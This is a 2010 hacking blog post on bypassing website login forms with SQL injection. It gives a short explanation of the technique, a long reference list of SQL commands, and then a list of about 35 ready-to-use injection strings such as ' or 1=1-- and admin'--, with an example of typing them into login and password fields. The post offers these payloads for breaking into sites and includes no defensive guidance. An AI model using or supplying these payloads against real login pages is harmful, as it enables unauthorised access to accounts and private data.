For those of you who dont already know SQL injection is a technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a Web application for execution by a backend database. Attackers take advantage of the fact that programmers often chain together SQL commands with user provided parameters, and can therefore embed SQL commands inside these parameters. The result is that the attacker can execute arbitrary SQL queries and commands on the backend database server through the Web application.
A database is a table full of private and public site information such as usernames, products, etc. They are fundamental components of Web applications. Databases enable Web applications to store data, preferences and content elements. Using SQL web applications interact with databases to dynamically build customized data views for each user.
Data types:
mysql.user
mysql.host
mysql.db
SQL commands:
ABORT -- abort the current transaction
ALTER DATABASE -- change a database
ALTER GROUP -- add users to a group or remove users from a group
ALTER TABLE -- change the definition of a table
ALTER TRIGGER -- change the definition of a trigger
ALTER USER -- change a database user account
ANALYZE -- collect statistics about a database
BEGIN -- start a transaction block
CHECKPOINT -- force a transaction log checkpoint
CLOSE -- close a cursor
CLUSTER -- cluster a table according to an index
COMMENT -- define or change the comment of an object
COMMIT -- commit the current transaction
COPY -- copy data between files and tables
CREATE AGGREGATE -- define a new aggregate function
CREATE CAST -- define a user-defined cast
CREATE CONSTRAINT TRIGGER -- define a new constraint trigger
CREATE CONVERSION -- define a user-defined conversion
CREATE DATABASE -- create a new database
CREATE DOMAIN -- define a new domain
CREATE FUNCTION -- define a new function
CREATE GROUP -- define a new user group
CREATE INDEX -- define a new index
CREATE LANGUAGE -- define a new procedural language
CREATE OPERATOR -- define a new operator
CREATE OPERATOR CLASS -- define a new operator class for indexes
CREATE RULE -- define a new rewrite rule
CREATE SCHEMA -- define a new schema
CREATE SEQUENCE -- define a new sequence generator
CREATE TABLE -- define a new table
CREATE TABLE AS -- create a new table from the results of a query
CREATE TRIGGER -- define a new trigger
CREATE TYPE -- define a new data type
CREATE USER -- define a new database user account
CREATE VIEW -- define a new view
DEALLOCATE -- remove a prepared query
DECLARE -- define a cursor
DELETE -- delete rows of a table
DROP AGGREGATE -- remove a user-defined aggregate function
DROP CAST -- remove a user-defined cast
DROP CONVERSION -- remove a user-defined conversion
DROP DATABASE -- remove a database
DROP DOMAIN -- remove a user-defined domain
DROP FUNCTION -- remove a user-defined function
DROP GROUP -- remove a user group
DROP INDEX -- remove an index
DROP LANGUAGE -- remove a user-defined procedural language
DROP OPERATOR -- remove a user-defined operator
DROP OPERATOR CLASS -- remove a user-defined operator class
DROP RULE -- remove a rewrite rule
DROP SCHEMA -- remove a schema
DROP SEQUENCE -- remove a sequence
DROP TABLE -- remove a table
DROP TRIGGER -- remove a trigger
DROP TYPE -- remove a user-defined data type
DROP USER -- remove a database user account
DROP VIEW -- remove a view
END -- commit the current transaction
EXECUTE -- execute a prepared query
EXPLAIN -- show the execution plan of a statement
FETCH -- retrieve rows from a table using a cursor
GRANT -- define access privileges
INSERT -- create new rows in a table
LISTEN -- listen for a notification
LOAD -- load or reload a shared library file
LOCK -- explicitly lock a table
MOVE -- position a cursor on a specified row of a table
NOTIFY -- generate a notification
PREPARE -- create a prepared query
REINDEX -- rebuild corrupted indexes
RESET -- restore the value of a run-time parameter to a default value
REVOKE -- remove access privileges
ROLLBACK -- abort the current transaction
SELECT -- retrieve rows from a table or view
SELECT INTO -- create a new table from the results of a query
SET -- change a run-time parameter
SET CONSTRAINTS -- set the constraint mode of the current transaction
SET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of the current session
SET TRANSACTION -- set the characteristics of the current transaction
SHOW -- show the value of a run-time parameter
START TRANSACTION -- start a transaction block
TRUNCATE -- empty a table
UNLISTEN -- stop listening for a notification
UPDATE -- update rows of a table
VACUUM -- garbage-collect and optionally analyze a database
Bypassing login scripts:
SQL injection strings and the DB doesnt matter.
') OR ('a' = 'a
') OR ('1'-'1
'or''='
' OR '1=1
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 *
" or 0=0 *
or 0=0 *
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
' or 1=1--
or a=a--
' or 1=1--
1' having '1'='1'--
' or 'x'='x--
foo'+OR+'1'='1
Note: having 1=1--
Example:
Login: hi'or 1=1--
Password: hi'or 1=1--
Bypassing login scripts with SQL Injection
Thursday, February 11, 2010
by BBTUNA
Posted in |
0 Comments »
Subscribe to:
Post Comments (Atom)
About Me
- BBTUNA
Blog Archive
-
▼
2010
(41)
-
▼
February
(41)
- Change The Default Location For Installing Apps
- Closing Open Holes, System Security How to close o...
- Create An Ftp Server On Your Pc With Serv-u
- Easily Find Serial Numbers On Google
- How To Find Ftp's The Easy Way
- HowTo: Create a Reverse SSH Tunnel
- Show apps that use internet connection at the moment
- How to install, configure and work a LAMP stack wi...
- Creating a simple key logger
- How to make a hidden user account
- Locking and Hiding Hard-Drives
- Batch Files
- Securing your PHP code
- Bypassing login scripts with SQL Injection
- How to hack boost mobile
- Hacking phpBB 2.0.19 or lower by stealing cookies
- JavaScript Injection
- Bypassing Web Filtering Systems
- Obtaining The Administrative Account
- Packet Generator
- Acer Aspire One BIOS Recovery
- Howto: Ubuntu Linux convert DHCP network configura...
- How to Setup SSH Server in Windows with freeSSHd
- Bypass Windows Vistas and Windows 7’s Reduced Func...
- Setup Linksys Router With Radius Server Authentica...
- Twitter Security Cam
- Connect USB Drive to VMware ESX Server
- How to Create an Internet Kiosk in 10 Easy Steps o...
- Install Squid Proxy Server on CentOS
- VNC ( Virtual Network Computing ) on CentOS
- How to trunk ports on a Cisco Switch
- Linux Kiosk system
- Trunking ports on switches
- How to disable Last Logon Name in Windows 2000,XP&...
- Metasploit 3.2 VBA Support for generating payloads
- Installing NaviAgent on ESX 3.x and 3.5x
- How to Convert a Video Into a Gif Animation
- VMware ESX storage: How to get local storage to ac...
- How to Install and Configure DHCP Server in Ubuntu...
- Aircrack-ng on the MAC
- Reflashing FON Fonera 2200
-
▼
February
(41)
0 comments:
Post a Comment